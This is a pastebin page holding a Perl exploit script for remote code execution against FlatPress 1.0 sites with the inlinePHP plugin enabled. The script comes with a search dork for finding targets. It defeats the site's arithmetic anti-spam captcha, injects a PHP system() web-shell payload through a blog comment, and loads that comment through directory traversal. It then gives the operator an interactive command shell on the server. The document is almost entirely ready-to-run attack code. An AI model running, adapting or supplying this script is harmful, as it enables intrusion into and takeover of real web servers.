Flatpress 1.0 - Remote Code Execution


SUBMITTED BY: Guest

DATE: Nov. 24, 2013, 11:48 p.m.

FORMAT: Text only

SIZE: 4.3 kB

HITS: 2047

  1. #!/usr/bin/perl
  2. # Exploit Title: Flatpress remore code execution PoC NULLday
  3. # Google Dork: This site is powered by FlatPress.
  4. # Date: 17/10/2013
  5. # Exploit Author: Wireghoul
  6. # Vendor Homepage: http://flatpress.org/home/
  7. # Software Link:
  8. http://downloads.sourceforge.net/project/flatpress/flatpress/FlatPress%201.0%20Solenne/flatpress-1.0-solenne.tar.bz2
  9. # Version: v1.0
  10. #
  11. # Blended threat, executes code injected into comment
  12. # by loading comment as a page through directory traversal
  13. # Requires the inlinePHP plugin to be enabled.
  14. # Written by @Wireghoul - justanotherhacker.com
  15. #
  16. # This is for my peeps and the freaks in the front row -- Hilltop Hoods:
  17. Nosebleed section
  18. use strict;
  19. use warnings;
  20. use LWP::UserAgent;
  21. &banner;
  22. &usage if (!$ARGV[0]);
  23. my $injid = 'Spl0ited'.int(rand(9999));
  24. my $ua = LWP::UserAgent->new;
  25. $ua->timeout(10);
  26. $ua->env_proxy;
  27. $ua->cookie_jar({ file => "tmp/flatpress-rce.txt" });
  28. sub banner {
  29. print "\nFlatpress remote code execution PoC by \@Wireghoul\n";
  30. print "=======================[ justanotherhacker.com]==\n";
  31. }
  32. sub usage {
  33. print "Usage: $0 <url>\n";
  34. exit;
  35. }
  36. my $response =
  37. $ua->get("$ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php");
  38. if (!$response->is_success) {
  39. print "[-] Inline PHP plugin not found at
  40. $ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php\n";
  41. } else {
  42. print "[+] Inline PHP plugin found, hopefully it is enabled!\n";
  43. }
  44. # Prepare for exploitation, find entry + comment location
  45. $response = $ua->get($ARGV[0]);
  46. if ($response->is_success) {
  47. if ($response->decoded_content =~
  48. /(http.*?x=entry:entry.*?;comments:1#comments)/) {
  49. my $cmntlink = $1;
  50. print "[+] Found comment link: $cmntlink\n";
  51. my $aaspam = 0; # Can't be bothered solving easy captchas, just
  52. reload page until we get one we like
  53. while ($aaspam == 0) {
  54. $response = $ua->get($cmntlink);
  55. if ($response->decoded_content =~ /<strong>(\d+) plus (\d+) \?
  56. \(\*\)/) {
  57. $aaspam = $1+$2;
  58. print "[+] Defeated antispam $1 + $2 = $aaspam\n";
  59. } else {
  60. $response->decoded_content =~ m/<strong>(.*) \? \(\*\)/;
  61. print "[*] Unknown antispam: $1 ... retrying\n";
  62. }
  63. }
  64. # Post a comment
  65. $response = $ua->post(
  66. $cmntlink."form",
  67. Content => {
  68. 'name' => $injid,
  69. 'email' => '',
  70. 'url' => '',
  71. 'aaspam' => $aaspam,
  72. 'content' =>
  73. "SHELL[exec]system(\$_GET['cmd']);[/exec]LLEHS",
  74. 'submit' => 'Add',
  75. }
  76. );
  77. $response = $ua->get($cmntlink);
  78. # Find link to injected content, then execute psuedo shell in loop
  79. my @cmnts = split (/<li id="comment/, $response->decoded_content);
  80. my @injected = grep /$injid/, @cmnts;
  81. if ($injected[0] =~ /$injid/) {
  82. print "[+] Injection ($injid) successful\n";
  83. $injected[0] =~
  84. m/(http.*?)x=entry:entry(\d\d)(\d\d)(\d\d-\d+);comments:1#comment(\d+-\d+)/;
  85. my
  86. $shell="$1page=../../content/$2/$3/entry$2$3$4/comments/comment$5";
  87. print "[*] Dropping into shell, type exit to exit\n";
  88. my $line='';
  89. while (1) {
  90. print '$';
  91. $line=<STDIN>;
  92. if ($line =~ /^exit$/) { exit; };
  93. my $output=$ua->get("$shell&cmd=$line");
  94. $output->decoded_content =~ /SHELL(.*)LLEHS/ms;
  95. my $clean = $1; $clean =~ s/<br \/>//g;
  96. print "$clean\n";
  97. }
  98. } else {
  99. print '[-] Unable to identify the injection point';
  100. }
  101. } else {
  102. print "[-] Comment link not found\n";
  103. }
  104. } else {
  105. die $response->status_line;
  106. }

comments powered by Disqus